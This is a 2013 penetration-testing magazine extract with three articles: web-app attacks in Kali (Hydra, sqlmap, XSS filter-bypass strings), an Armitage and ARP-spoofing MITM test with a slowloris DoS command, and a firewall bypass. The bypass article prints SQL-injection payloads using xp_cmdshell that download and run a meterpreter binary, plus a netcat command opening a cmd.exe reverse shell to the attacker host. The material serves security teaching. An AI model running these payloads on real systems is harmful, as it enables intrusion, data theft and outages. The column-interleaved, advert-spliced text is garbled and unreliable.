Sometimes there are unnecessary, readable, to defeat Web authentication. So lets pretend that
downloadable and hidden files on a web server, there is no flaw in the selection of authentication
such as renamed, backup and old files which are protocol or its implementation, the most vulnerable
a huge source of information leakage. It is key to piece of most authentication systems is user pass-
verify the presence of these files because they word selection. Password guessing is one of the
may contain parts of source code, installation methods to defeat web authentication. Kali Linux
paths as well as passwords for web applications has many robust tools such as Hydra, Medusa for
and databases. The file extensions present in a password guessing. My favorite brute-forcer is Hy-
web server or a web application make it possible dra which can be used to perform a dictionary at-
to identify the technologies which compose the tack against any target. Hydra works by allowing a
target application, for instance jsp, inc and asp tester to specify a target, and using the username

SCENARIOS
and password list attempts to apply brute force to If the brute-force method is successful, the next
passwords by using various combinations of user- step is to log into the application and see if you
names and passwords from both the lists. Hydra can gain horizontal privilege escalation which is re-
currently supports: TELNET, FTP, HTTP-GET, ferred to accessing a colleagues information and
HTTP-HEAD, HTTPS-GET, HTTPS-HEAD, HTTP- vertical privilege escalation which is the fact of ac-
PROXY, LDAP2, LADP3, SMB, SMBNT, MS-SQL, cessing a prominent users information. The pos-
MYSQL, POSTGRES, REXEC, RSH, RLOGIN, sible situation for authorization attacks grow with
CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, the amount of functionality in the application. In or-
IMAP, NNTP, PCNFS, ICQ, SAP/R3, SSH2, Team- der to successfully launch a privilege escalation at-
speak, Cisco auth, Cisco enable, Cisco AAA. xHy- tack, the tester needs to identify the component of
dra is Hydra with a GUI. This graphical interface is the application that tracks the users identity and
a good place for new pentesters to start practicing roles. This might be as easy as looking for your
and then move to the command line. username in one of the following locations, or the
The Figure 19 and Figure 20 shows the usage of authorization scheme might be based on cryptic
hydra on the terminal. values set by the server. As a tester you need to
know what youre looking for in order to attack au-
thorization. Query strings in browsers are so eas-
ily modifiable, many Web application programmers
prefer to use the POST method rather than GET
with query strings.
In Kali Linux a tester can use curl which is a fan-
tastic tool for automating tests. Any time you have
determined that it is probable to change the profile
and user identifier parameters on the URL in order
to view someone elses profile (Figure 21).
Figure 19. Hydra Usage in Kali
Figure 21. Curl Usage in Kali
Input validation attacks endeavor to submit data

which the web application does not expect to re-
ceive. In general, a web application will perform
some type of sanity check on user input. This check
Figure 20. Hydra GUI (xHydra) in Kali Figure 22. Burp suite

tries to ensure that the data is useful and does The Figure 23 and Figure 24 show the fuzzer
not present any harm to the end-user as well the tool: Powerfuzz and Wfuzz.
web server. More important checks are necessary Web applications present lot information from
to prevent the data from crashing the server. Less general, financial to personal. Usually, users see
thorough verifications are required if the data is only a nice graphic interface in front of them when they
to be limited to a specific length. Using burpsuite navigate for instance to pentestmagazine.com.
free version or owasp-zap as proxy in Kali Linux, End-users are not seeing or do not pay attention
you can perform input validation attacks to any giv- at the database sitting behind the scene. Contrary
en application. The Figure 22 that a tester can use to what many may believe, attackers are very in-
burpsuite to test for input validation using Intruder. terested on back-end databases, and most of the
Fuzzy analysis is a very critical application test- times the databases are their main target.
ing method used by many software and cyber se-
curity experts to test their applications against un-
expected, invalid, and random set of data inputs.
This activity uncovers some of the major vulner-
abilities in the web application, which otherwise
are not possible to discover. These include buffer
overflows, format strings, code injections, denial Figure 24. Wfuzz in Kali
of service, and many other types of vulnerabilities.
There are different classes of fuzzers available un- Numerous malicious attackers use a technique
der Kali Linux that can be used to test web ap- known as SQL Injection. SQL injection is an attack
plications. Any untrusted source of data input is in which a web applications security is compro-
considered to be insecure and inconsistent. For in- mised by inserting a SQL Query in the web appli-
stance, a trust periphery between the web applica- cation which performs operations on the underlying
tion and the end-user is changeable. Thus, all the database. These operations are unintended by the
information inputs should be fuzzed and validated applications developers and are usually malicious
against known and unknown vulnerabilities. Fuzzy in nature. Attackers take full advantage of the fact
analysis is a relatively simple and effective solu- that designers usually take SQL commands having
tion that can be incorporated into a security test- parameters which are user supplied. SQL injection
ing process. For this reason, it is also sometimes vulnerabilities occur whenever input is used in the
known as robustness testing or negative testing. building of an SQL query without being adequately
There are many tools that can be utilized for fuzz- constrained or sanitized. The use of dynamic SQL
ing in Kali Linux. The tools include: powerfuzzer, opens the door to these vulnerabilities. SQL injec-
wfuzz, owasp-zap, burpsuite. tion allows an attacker to access the SQL servers
and execute SQL code under the privileges of the
user used to connect to the database.
When database access is being put into oper-
ation, the end user may be requested for certain
information, such as a username, password. In
many cases, that input will be tested with an SQL
query. If input checking is not done, or poorly done,
an attacker may be able to use SQL injection to en-
ter a string that includes both the users name and
another SQL query. In some cases, the input may
even contain a full SQL statement that will be ex-
ecuted to do whatever the attacker wishes.
It is extremely crucial for a tester to compre-
hend the architecture and the technology infra-
structure of the web application. The assessment
tools provided in Kali measure the security of web
applications and databases in a joint technolo-
gy evaluation process. It means that some tools
Figure 23. Powerfuzzer in Kali will exploit the web frontend in order to compro-

SCENARIOS
mise the security of backend database. The da- # ./sqlmap.py -u http://TargetHost/vurln.
tabase analysis tools in Kali are selected based php?user=relax dbs dbms=mysql
on their main functions and capabilities. These --threads=1
set of tools mainly deal with enumeration, pass- If you want to send more requests at the
word auditing and assessing the target with SQL same time this is faster but it needs a good
injection attack, thus allowing a tester or mali- connection.
cious person to review the weaknesses found in --technique=BEUSTQ
the frontend web application as well as the back- If you dont want to test all techniques because
end database. Kali Linux database tools include: of noise or other reason.
SQLMap, SQL Ninja, BBQSQL, SQLsus. As If nothing is found you can try to increase:
Shawn Evans from KCG stated SQLMap is the --level=(1-5)
Rolex of automated SQL injection tools. SQL- --risk=(0-3)
Map is an advanced and automatic SQL injection
tool. Its main purpose is to scan, detect, and ex- SQL Ninja is another specialized tool built to tar-
ploit the SQL injection flaws for the given URL. get web applications that use MS-SQL Server on
It currently supports various database manage- the backend, and are vulnerable to SQL injection
ment systems (DBMS) such as MS-SQL, MySQL, flaws. Its main function is to exploit the vulnera-
Oracle, and PostgreSQL. SQLMap employs four bilities by taking over the remote database serv-
unique SQL injection techniques; this includes in- er through an interactive command shell instead
ferential blind SQL injection, UNION query SQL of just extracting the data out of the database.
injection, stacked queries, and time-based blind Cross-site scripting, also known as XSS, is the
SQL injection. The Figure 25 and Figure 26 illus- process of injecting scripts into a web application.
trate how to launch and use SQLMap with all the The injected script can be stored on the original
different options. web page and run or processed by each browser
that visits the web application. This process occurs
as if the malicious script is part of code. Cross-site
scripting is different from many other types of at-
tacks as XSS focuses on attacking the client, not
the server. Although the malicious script itself is
stored on the web application, the actual goal is
to get a client to execute the script and perform
an action. As a tester, you should understand that
Figure 25. SQLMMap in Kali there are numerous cross-site scripting attack vec-
tors. Aside from simply entering code into an in-
put box, malicious hyperlinks or scripts can also
be embedded directly into websites or e-mails.
Several e-mail clients today automatically render
HTML e-mail. Usually, the malicious portion of a
malicious URL will be obfuscated in an attempt to
appear more legitimate. In its simplest form, con-
ducting a cross-site scripting attack on a web ap-
plication that does not perform input sanitization
is easy. When you are only interested in provid-
ing proof that the system is vulnerable, you can
use some basic JavaScript to test for the presence
of XSS. Input boxes in the web applications are
an excellent place to start. Rather than entering
expected information into a textbox, a penetration
tester should attempt to enter the script tag fol-
lowed by a JavaScript alert directly into the field.
The classic example of this test is listed below:
Figure 26. Using SQLMap in Kali <script>alert(KCG)</script>

The tester can also use <scr%00ipt>XSS<scr%00
ipt> or <scr/****/ipt>XSS<scr/****/ipt> in References
case the word script is blocked. If the script tag http://www.kali.org/
http://docs.kali.org/category/introduction
is being purged by the filter, the tester can used http://sqlmap.org/
<scr<script>ipt>. http://www.goodreads.com/quotes/17976-if-you-
Another technique is to encode the brack- know-the-enemy-and-know-yourself-you-need
ets before the script does. %3cSCRIPT%3eXSS%3c/ https://www.owasp.org/index.php/OWASP_Man-
SCRIPT%3e. tra_-_Security_Framework
Lastly, the tester can turn the backslashes into http://www.openvas.org/
http://www.thc.org/thc-hydra/
comments. ht t ps: // w w w.o wasp.o rg / i n d e x . p h p/
Category:OWASP_DirBuster_Project
\; XSS;// http://www.exploit-db.com/wp-content/themes/ex-
ploit/docs/18895.pdf
Tools like WebScarab, Burp Proxy, XSSer and http://www.barnesandnoble.com/w/basics-of-hack-
BeEF can be very handy when it comes to iden- ing-and-penetration-testing-patrick-engebretson/110
2212673?ean=9780124116443
tifying cross site scripting. XSSer is an open
source penetration testing, it provides the facility
of detecting and exploiting the cross site scripting tion tester with practical client side attack vectors.
bug on various web application. Unlike other security frameworks, BeEF focuses
on leveraging browser vulnerabilities to assess the
security posture of a target.
In conclusion, information technology (IT) secu-
rity is the discipline and art of protecting data in
electronic format, and in order to safeguard sen-
sitive and critical data a tester needs to have the
right tools. As Sun Tzu stated If you know the ene-
my and know yourself, you need not fear the result
of a hundred battles. However, I will say this If
you know the web application and armed with Ka-
li Linux, you need not panic to compromising any
Figure 27. XSSer in Kali
web application.
Another useful tool when it comes to cross site
scripting is BeEF. It is acronym for Browser Exploi-
tation Framework, its used to collect many of zom- Lamin Fatty
bies and do a lot of exciting attacks on those zom- Senior Penetration Tester at Knowledge Con-
bies that give us a great environment because it sultant Group (KCG). He went to the Universi-
makes the hard work instead of you. The Browser ty of Detroit Mercy where he earned a mas-
Exploitation Framework (BeEF) is a powerful pro- ter degree in Information Assurance/Cyber
fessional security tool. BeEF is leading the way Security. He has many years of experience in
techniques that provide the experienced penetra- Vulnerability Assessment, Penetration Test-
ing, Information Assurance, and Network-
ing. Presently, Lamin performs several tasks
including: Performing external and internal penetration tests,
network vulnerabilities assessment to provide a comprehen-
sive view of the clients network weaknesses that are exposed to
threats. Carry out application vulnerability assessments to pro-
vide a good understanding of the different clients application
weaknesses that are exposed. Identify IT related risks throughout
areas including perimeter, network, host, application, data and
physical security. Perform mobile application (IOS and Android)
assessments to provide a clear view of the different clients appli-
cation weaknesses that are exposed. Harden several databases
Figure 28. BeEF Usage in Kali including MSSQL, Oracle, Mysql, and PostgreSQL.

SCENARIOS
Penetration Testing
with Linux
Penetration testing with Linux is one of the best ways to perform
tests. It is a versatile tool. Linux comes in many flavors like
Backtrack5 RC3 or now Kali. Linux allows the customization of
the software itself plus the tools that you use. Therefore, the
customization and level of sophistication is limitless. This article
will cover using Backtrack5 RC3 and Armitage as it is executed
during the pentest.
T
his article may not cover all features of Ar- chose to use Kali in this article to show you some-
mitage. However, in order to provide you a thing recent but the other versions of Linux are still
better understanding of Amritage, Kali will very good tools to use in the field.
be used as well in different screenshots. Note that Backtrack comes loaded with metasploit and as
Armitage is no longer supported under Backtrack you know in order to find and run an exploit you
with the recent release of Kali in early 2013. We have to switch to the directory and run the com-
Figure 1. Armitage Launching

mands specific to it. This is no longer the case
with Kali and the FHS (Filesystem Hierarchy Stan-
dard) Kali has taken care of this to make all com-
mands system wide accessible from the command
line. Armitage provides a nice GUI interface to
Metasploit. It also has a dashboard which you can
use for setting up the hosts or network you are go-
ing to target. You can import hosts from files asso-
ciated with other networks which security assess-
ment tools like Nessus, IP360, and Burp session
xml. Armitage imports anything from a text or xml
file. You can use some of the automation present-
ed with Armitage. In addition, it is wise to use cus-
tomized these scripts when delivering a penetra-
tion test. You never really know what the outcome
may be unless you test in a lab first. The great thing
about Armitage is that it has a database of known [ GEEKED AT BIRTH ]
vulnerabilities and attacks which you can draw in-
to your test. This helps saves time and keep you
focused but not all exploits work as targets can
be hardened. Customizing scripts and Linux has
long been the core of these releases. Armitage
can be used as a standalone tool as well as net-
work solution when working with other pentesters.
There are a few reporting options that can be used
with Backtrack or Kali to save your work and share
results or progress. Armitage has its own place to
store evidence in data format but not in a report
format that would be all inclusive. This is what is
called loot where the results go. You can talk the talk.
Launching Armitage comes from navigating to
the Applications menu item and following the terms
Can you walk the walk?
Kali Linux > Exploitation Tools > Network Exploita-
tion > Armitage (Figure 1). In this new installation [ ITS IN YOUR DNA ]
of Kali, you will have to manually type the follow-
ing commands in order to get Armitage to connect LEARN:
Advancing Computer Science
to the database. They are: service postgresql start Artificial Life Programming
and service metasploit start. Once these are en- Digital Media
tered, you can start Armitage successfully using Digital Video
the install default user name msf and password Enterprise Software Development
test (Figure 1). Game Art and Animation
Game Design
Next there are a series of prompts that you will Game Programming
be directed to for launching and customizing port Human-Computer Interaction
usage. Once Armitage is open, we can begin using Network Engineering
it to scan for hosts or network subnets. Just launch Network Security
Open Source Technologies
Nmap (Figure 2) from within Armitage and choose
Robotics and Embedded Systems
to add a host or scan a network with several script- Serious Game and Simulation
ed choices. The rules are the same for using nmap Strategic Technology Development
in Armitage and by itself. There are aggressive Technology Forensics
scan and quieter scans. So choose wisely in or- Technology Product Design
Technology Studies
der to remain quiet. The machines that we want Virtual Modeling and Design
to target are 10.10.10.5 and 10.10.10.7. One is a Web and Social Media Technologies
server hosting the core business application and
www.uat.edu > 877.UAT.GEEK
EXTRA 05/2013(16) Please see www.uat.edu/fastfacts for the latest information about
degree program performance, placement and costs.
SCENARIOS
the other is a typical user workstation. See image
3 below from the previous run pentest Armitage on
Backtrack5 RC3.
Figure 3. Note the lightning around Hosts = pwned
In the pentest shown here the machines admin-

istrator accounts were known in a white box test to
see if we can sniff traffic from the core business ap-
plication. We are going to imitate an insider threat
or demonstrate beyond passing the hash for Win-
dows users in the network.
The following shows what we want to test. This is
taken from a lab setup a typical company that uses
earth materials management system. The network
is made of Microsoft Windows machines with Win-
dows 7 for end users and Windows Server 2008
R2. The objective is to look for vulnerabilities on
the host machines to see if we can capture data on
the hosts going across the network to the server
for corporate espionage.
Figure 2. Launching nmap within Armitage Test Core Business Application

Test core business application against
The next step you want to do is tofind vulner- Clear text traffic capturing
abilities scan. This takes Armitage and scans the Man in the middle (MITM)
hosts out there and it comes up with a proposed Spoofing
list of attacks. Now not all and every attack is go- Armitage w/Meterpreter
ing to work. It will give a type of technology to ex- DoS Slowloris
ploit. This coupled with your experience and train-
ing will then discover if it is or it is not successful. Port Scanning Results and Issues
This is where the pentester needs to be on their Scanning Windows machines
best game to find an exploit in which to launch a The first test was scanning of services and ports
payload. The good thing about Armitage is that on Microsoft devices. The test discovered the de-
each exploit or payload, that you try, opens a new fault Windows system ports open for unsigned
tab. So you can see what works, what doesnt and SMB, telnet, and high ports. This included the port
where to go next. scanning by Nessus as well as the Microsoft Base-
Now that we have our hosts found, targeted, and line Analyzer. The results from Nessus showed
with an attack list, we can proceed. Since the ma- that there existed an unsigned SMB/Samba port
chines were Windows based, we quickly went to (445) as well as using the open clear text port
this exploit to see if there was a way to pwn the channel (23). Nessus found only (1) medium and
boxes. In Armitage you can assign accounts to (1) low alert for the server 10.10.10.5. Port (135)
each host that is used to login and run the pay- on the workstation was found open and that was
loads. We chose many exploits but we found only used for remote procedure protocol. Port (139)
one that really works and will be addressed later. was found open and used with SMB for file shar-
Below in Figure 3 you can see that when a system ing with other devices beside Microsoft. Port (808)
username and password are known and the Login is the Streetsmarts Web based application running
> psexec is used, the lightning is seen all around it. encrypted. Port (992) was found to be an SSL port

with a certificate error. Additional ports were found sslstrip, urlsnarf, dnsiff, and Driftnet with these
open ranging from (49152-49157) and were due commands entered. In Ettercap, we scanned the
from a release from Microsoft in January 2008 to subnet and added a target 1 = gateway and target
start the open port range at that (49152). Some 2 = the victim machine. Here, we were able to get
P2P (peer-to-peer) file sharing has been known to a copy of everything being sent by the user to the
run over these ports. laptop (attacker) first before going to the real gate-
The possible attack that could have occurred way. This is done with sslstrip, iptables, ettercap
but was not conducted in the test was escalation with MITM attack arp spoofing. It is very important
in privileges via SMB vulnerability and brute forc- that in a test where you are trying to conceal what
ing usernames and passwords. The attacker also you are doing from detection that you must ensure
could have social engineered the information from you laptop is able to handle the traffic. You must be
an unsuspecting user. There is a probability that ready to execute the sequence of commands in or-
this could have happened. der to avoid seeing packets destined to the same
Armitage has the option for you to ask it what IP address twice.
vulnerabilities and attacks could be possible on the Each attack and tool used has its benefits and
chosen target. Just go to the host, select it and then limitations. The idea was to see data going across
go to the menu Attacks > Find Attacks. It will return for corporate espionage and send to a competi-
a list of possible attacks and say Happy Hunting! tor for money. The tools researched and chosen
Therefore, that is exactly what happened. for this pentest to see what would really come
The following tools were used to test a vulner- across the wire. The following is a brief overview
ability of unencrypted communication on the LAN of each tool.
(Local Area Network) with ettercap always being
used for the MITM. They are SSLstrip, Dsniff, Drift- SSLstrip
net, Urlsnarf, and meterpreter. Is a tool that prohibits a connection from upgrading
to an SSL session in an unnoticeable way. Also the
Technical Overview Sniffing MITM history behind this is that one could forge a certifi-
Attacks cate as being signed and trusted in order to appear
Using Ettercap we copied traffic from the user and as an https session or that the session was legiti-
the gateway to our pentesting laptop. We used mate with the intended server that actually ended
Ettercap with the following attempt to see traffic, up being the attacker (Wikipedia).
Listing 1. Target picking
Execute the following commands

In the CLI we entered:
root@bt:/# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:/#cat /proc/sys/net/ipv4/ip_forward
root@bt:# sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port
10000
Now verify it took the filter
root@bt:~# iptables -L -t nat
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
REDIRECT tcp -- anywhere anywhere tcp dpt:www redir ports 10000
Chain INPUT (policy ACCEPT)
Chain OUTPUT (policy ACCEPT)
Chain POSTROUTING (policy ACCEPT)
root@bt:# sudo python sslstrip.py -l 1000 -f lock.ico

SCENARIOS
Dsniff Meterpreter
A tool used to sniff anything of interest like email or This tool can be used to take advantage of many
passwords. Arp spoof has to be running of course vulnerabilities in different platforms in order to gain
so that the traffic is routed through the attacker PC root access or control of a PC.
and back out to the real router and PC (Wikipedia).
Script Execution
Driftnet In the following presentation of code we see that nu-
This tool allows you to see what images are going across merous attempts utilizing ettercap and arp spoofing
the users browser while surfing the web. In this test us- were done to send traffic to the attacker. Each tool
ers were not on the internet but were using a browser to was run alongside ettercap to see what information
launch an application which we wanted to see. would actually pass to the attacker. The most excit-
ing tools were Driftnet and meterpreter because of
Urlsnarf what could be seen and the control.
A tool that places all visited url output to file for
easy reviewing. Not a tool that provides much ad- ettercap --mitm ARP:REMOTE --text --quiet --write
vantage in this pentest. /root/sslstrip/ettercap.log --iface eth0
Listing 2. Technical Output
root@bt:~# urlsnarf -n -i eth0

urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]
10.10.10.7 - - [15/Jan/2013:23:10:12 -0500] GET http://www.google.com/ HTTP/1.1 - - -
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
10.10.10.7 - - [15/Jan/2013:23:10:13 -0500] GET
10.10.10.7 - - [15/Jan/2013:23:11:17 -0500] GET http://www.mwsystems.com/servlet/servlet.FileDown
load?file=01540000000nqRS HTTP/1.1 - - http://10.10.10.5/ Mozilla/5.0 (compatible; MSIE 9.0;
Windows NT 6.1; WOW64; Trident/5.0)
load?file=01540000000nr9Z HTTP/1.1 - - http://10.10.10.5/ Mozilla/5.0 (compatible; MSIE 9.0;
load?file=01540000000nr9K HTTP/1.1 - - http://10.10.10.5/ Mozilla/5.0 (compatible; MSIE 9.0;
load?file=01540000000nr9A HTTP/1.1 - - http://10.10.10.5/ Mozilla/5.0 (compatible; MSIE 9.0;
load?file=01540000000nroD HTTP/1.1 - - http://10.10.10.5/ Mozilla/5.0 (compatible; MSIE 9.0;
Listing 3. Results: Images from core business application were not being sent to our laptop despite driftnet running
root@bt:~# driftnet -i eth0 -v

driftnet: using temporary file directory /tmp/driftnet-AmaowM
driftnet: listening on eth0 in promiscuous mode
driftnet: using filter expression `tcp
driftnet: started display child, pid 2562
driftnet: link-level header length is 14 bytes
.driftnet: new connection: 10.10.10.7:49363 -> 23.45.9.75:80
...driftnet: new connection: 10.10.10.7:49365 -> 23.45.9.75:80

Figure 4. Armitage Text Output of Key logging
Also the GUI was used to pick target client Win- Results
dows 7 machine 10.10.10.7 and second target the We were able to log keystrokes and take screen
application server 10.10.10.5 (Listing 1). shots of the users computer. This is one way data
could be captured. In this test, we show that key
Results sslstrip logging and screen captures are possible; however,
No data or text of any sort was visible, since all data they are not very effective as shown below, Figure
was being passed through an encrypted channel. 7. Anything that was operating on the application
level of the OSI model remained visible and the tool
Results with dsniff worked. When things went encrypted at the network
Web addresses were visible, but no usernames or level it was impossible to see (Figure 4-7).
passwords. These results show that the applica- We have seen before that the desktop can be
tion is very secure. captured with screen shots and information could
be leaked this way. However, notice in the image
Results with driftnet nr 7 that the application icon is present as a big S
There were no pictures or images of the site going in the toolbar, and on the workstation it is in the
across. There were web addresses being listed. foreground. However, the image reveals that it is
not seen and therefore encrypted to the reverse
Results with urlsnarf tcp shell. That S represents the businesss core
The only thing that came through here was some business application. The launch html page is the
local address space and some internet address only visible part of the application, which is done
space redacted for publication. Still there were no on port 80. This demonstrates that the application
real gems of information for quick gains (Listing 2). running on the computer was able to encrypt all
Executed commands (example): activity for queries, results, and navigation.
root@bt:/# echo 1 > /proc/sys/net/ipv4/ip_forward DoS Slowloris Python Script

root@bt:/#cat /proc/sys/net/ipv4/ip_forward 1 Now we get to some fun. Besides trying to sniff
traffic and look at client proprietary data, we can
In another terminal, we used Driftnet also try to make their systems unavailable to them
for this test. Remember that an unavailable system
root@bt:/# driftnet -i eth0 is loss of income or a serious impact that can make
root@bt:/# driftnet -i eth0 -v -s (in an attempt generating income and staying operational difficult
to gain audio being streamed) to do. The script that we will use is a python script
called slowloris. This script can be found at http://
We could then see what the user was looking for ha.ckers.org/slowloris/. There is a script for IPv6
at images (Listing 3).
Meterpreter
Meterpreter used in with Armitage, the connection
made it impossible to glean any data or provide a
way to leak data out; Meterpreter was used in this
test. Knowing the administrator password, the con-
nection was possible. Even a regular user with a
known password would be able to both pass the
hash dump and crack passwords later in order to
attempt to escalate privileges. Time being the fac-
tor is how successful the cracker would be by go-
ing slow and password cracking. Figure 5. Email Credentials Entered

SCENARIOS
as well. This script is unique in that it does not try server. The requests never get finished and the
to hammer the web server right away with a full web server is just sitting there with a session con-
load of requests but that it comes in waves. There sumed waiting for the user to resume communi-
is a setting in the script for the number of connec- cation. This weakness is known for some Apache
tions per second and the frequency of those con- servers but not on IIS 7.0. At the time of this test,
nections. These two fields were used against the it was unknown but I thought it would be fun to
server. The server was a Windows Server 2008 R2 try. Also check to make sure that you have Perl in-
(fresh install and no updates). stalled perl v as most Linux instances do.
In order to start the script after you have down- We modified the script to change the number of
loaded it to your pentest PC, you have to start with connections and then we lowered the timeout pe-
what is supposed to work and then review the re- riod for waiting to start that new connection. As the
sults and make changes. The changes, that we script ran, we would notice the CPU on the server
made, were simple, as each time slowloris runs it would spike to 78% and then 100% and then go
makes a whole bunch of half requests to the web down again as the script had entered its wait in-
terval. Then it would run again and we would see
similar results on the CPU. Now as far as hacking
goes, if you do not get the results you want to just
keep trying. So we stopped the script and changed
the connection per second to the maximum, so it
would take 10,000 per second and be tested again.
After the second run, the Server 2008 R2 would
just take a hit but continue to serve out the web
page. Unfortunately, for the pentester there was
no break in service. Fortunately, for the company
running the software, they stayed operational. As a
side note for non-Linux tool, we used the Low orbit
Ion Cannon multiple times on the server in addition
to slowloris and still the web site was up.
The following commands will result in the same
activity as we tested earlier in 2013.
./slowloris.pl -dns www.example.com -port 443

Figure 6. Screenshot Before Launching Encrypted -timeout 30 -num 10000 -https
Application
In conclusion, we see that Linux offers a wide va-
riety of attack tools that can be run independently
or a part of a package like Armitage, Kali, Ubun-
tu, and of course the metasploit framework. This
gives penetration testers the tools that need to
perform tests against vulnerabilities by testing the
exploits with different payloads. Some Windows
based tools that can be used have gained noto-
riety but still Linux is a preferred platform. What
is greaat about Linux and the open source com-
munity is that there are a lot of people contribut-
ing to its success. That is something that will car-
ry the distributions forward as ime and technolo-
gy change.
Figure 7. After Launching Encrypted Application Kevin Pescatello

SCENARIOS
Bypassing new generation

Firewalls with Meterpreter
and SSH Tunnels
During a recent penetration test I found a Windows host running
a web application that let me execute code via an SQL injection
error. The host was a Windows 2003 Server with an SQL Server
2005. It was part of a local area network (LAN), and my intention
was to use it to pivot to other hosts on the LAN, up to create me
an account of Domain Administrator and take possession of the
entire Network.
A
t this point, my attack vector was very clear: To solve the problem, I used encryption, since a
Upload and run a meterpreter payload to firewall can just inspect the packets in clear, but
get a remote session. not encrypted. To ensure packets were encrypted
end-to-end (from compromised machine to my lo-
Escalate privileges on the remote host. cal machine), I used an SSH tunnel, successfully
Capture the hash of the Administrator to use achieving my goal of bypass that security barrier.
it on other hosts. In this article I will try to explain step by step all
Use a Delegation Auth Token of a Domain the processes involved to bypass the deep in-
Admin user to impersonate it, and use it to cre- spection firewall and achieve a meterpreter ses-
ate a Domain Administrator user. sion with the remote host. The reason for wanting
Use the host as gateway to access other hosts a meterpreter session is the ease with which you
and servers on LAN. can escalate privileges and pivot to other hosts
from Metasploit Framework.
By testing the above attack vector, some prob- The process is summarized as follows:
lems were detected that had to be solved to
achieve the ultimate goal. Raise the necessary tools to the remote host.
The main problem was that after getting up one re- Establish ssh tunnel forwarding the needed
verse payload of meterpreter in the host and run it, ports.
the reverse connection did not reach its destination. Launch meterpreter payload through the tun-
My first thought was a firewall was blocking ac- nel.
cess to unusual ports, so I repeated the process Receive meterpreter session on the other side
this time using a payload trying to connect to port of the tunnel.
80 of my machine, but neither worked.
The same test using netcat worked, so I fig- How to upload the payload?
ured out that problem was related with the firewall When we have access to a Linux system, usually
blocking meterpreter packages probably for be- have no problem to upload files to, because normal-
ing a Deep Inspection Firewall with the signa- ly any Linux distribution comes with wget or curl,
tures of meterpreter in its signature file. so we just need a web server to publish the binaries

and download them using any of these tools. But in The /B switch of the command start prevents
Windows, things are different. By default we do not opening a window of cmd while running the pro-
have any of these tools or similar ones. We could gram. There could also be called simply met.
try to open Internet Explorer or Firefox if installed exe, but this would have left the process running
to download the file, but there is a danger that the the query, and for another injection would have
program remains pending user interaction and not to open a new window, because if canceled or
being on the screen would be a problem with that. closed it, the meterpreter session died unless it
So what I did (sure there are more ways) was to has migrated to another process.
use the command ftp from windows.
By default the ftp is an interactive program. Firewalls and Next Generation Firewalls
When executed asks for a username and pass- Today there are different types of Firewall. We can
word to log in. Once you logged in, the wanted or- make a first classification between Network Fire-
ders or commands can be introduced, ending the wall and Host Firewall.
session with a bye. Among the Network Firewalls, there are also dif-
But the ftp for Windows provides the ability to ferent types. Generally classified into three gen-
use it in a non-interactively way, passing in a text erations:
file all the strings that need you to send to the FTP
Server. This is achieved with -s file.txt. 1st Generation: packet filters (stateless). They
These are the steps I used to upload the files: work mostly at layer 3 (network layer) of the
OSI model (layer 4 just used to get the port
First I leave a file called met.exe (reverse me- numbers), filtering packets according to the in-
terpreter payload) in a public ftp. formation contained in the header (source IP,
Using the SQL injection I found, inject the fol- destination IP, protocol, source port and desti-
lowing system command: nation port). Do not keep information of current
connections.
;exec master..xp_cmdshell (echo ftp& echo kk@& 2nd Generation: Stateful Firewall. Keeps track
echo bin& echo get met.exe& echo bye) >ftp. of the state of network connections (such as
txt;exec master..xp_cmdshell ftp -s:ftp.txt TCP streams, UDP communication) traveling
IPServerFTP; -- across it.
3rd Generation: Application level firewalls.
This injection creates the file ftp.txt with the fol-
lowing contents: As new technologies are emerging, the classifica-
tion changes.
ftp Deep Packet Inspection (DPI) is the technology
kk@ used by the (IDS / IPS) to monitor packets looking
bin for protocol violations, viruses, spam, malware, etc.
get met.exe Next Generation Firewalls includes among other
bye features DPI technology to detect and block threats.
This article focus on deep packet inspection fire-
And then call the command ftp passing as pa- walls, and how to bypass the malware detection
rameter the -s and the file we just created. feature, to get a meterpreter remote session.
The result of this is the host will connect to the Packet filtering firewalls are devices that filter in-
FTP server, authenticate an anonymous session, coming and outgoing traffic of a network monitor-
execute the command bin, execute get met.exe ing IP addresses and ports. Basically work with
which will download the file in the system and end access control lists (ACLs), which are static. They
the FTP session with the bye command. can do nothing against an attack via http if the
At this moment we have the payload on the re- http protocol is allowed on the network.
mote host, and we only need to run it with another Next Generation Firewalls goes far, trying to fig-
SQL injection, and put a Metasploit handler on the ure out the type of traffic traveling in each packet,
attacker host to get a meterpreter session. providing IDS capabilities, content management,
This is the SQL injection we would use: dynamic packet blocking, etc.
Traffic inspection, is essentially based on signa-
;exec master..xp_cmdshell start /B met.exe;-- tures (unique patterns to each malware type that

SCENARIOS
IDS or antivirus manufacturers used to recognize mote host to our local host (with public IP address)
such malware). So if it detects a malware signature on different ports. Usually we try the most com-
in a package, block or reject the current connection mon ports like 80 (http), 443 (https), 53 (dns), 25
and in some cases, warns the administrator. (SMTP), 22 (ssh), etc. We try non standard ports
To accomplish this, the firewall captures every like 6666 to find out if there are restrictions on out-
packet, check its header and data section (if any) going connections.
and if everything is correct and complies with the To perform this procedure we upload nc.exe
security policy of the company, the packet is for- (netcat) and plink.exe (putty ssh client for com-
warded by the outgoing interface. mand line) using ftp procedure explained before.
As usual, the meterpreter payload signature Then, in the local host (attacker host) put a net-
can be found in most antivirus databases, as well cat listening on a port we want to try, for example
as in IDS and firewalls signature database. That port 21.
means in case a meterpreter reverse connection
were launched from inside a Network with this type root@kali:~# nc -vvv -l -p 21
of protection, the payload should be detected and listening on [any] 21 ...
the connection would be rejected.
This was the case I found during my last penetra- And in the remote host using the SQL injection:
tion test.
So, what then? How to get a meterpreter session ;exec master..xp_cmdshell nc.exe IP_Kali 21 e
on the remote host? cmd.exe;--
Both, firewalls and IDS inspect the packets con-
tent in clear. To bypass the inspection, the solution This opens a connection between remote host
is to encrypt from end to end the data traveling in (any port) to local host (port 21) and spawns a
those packets, so these devices would not under- cmd.exe, giving us a remote shell.
stand it.
How to make a meterpreter reverse connection
over an encrypted channel from end to end pass-
ing the firewall?
This is where SSH tunnels come into play. SSH
allow us to send encrypted traffic on a channel that
usually firewalls allow. We need to launch an SSH
connection from within the LAN to an Internet serv-
Figure 1. Netcat listening on port 21 receives a connection
er and use that channel we created to open a re- from remote host and spawns a shell
verse connection (get a shell or session on the re-
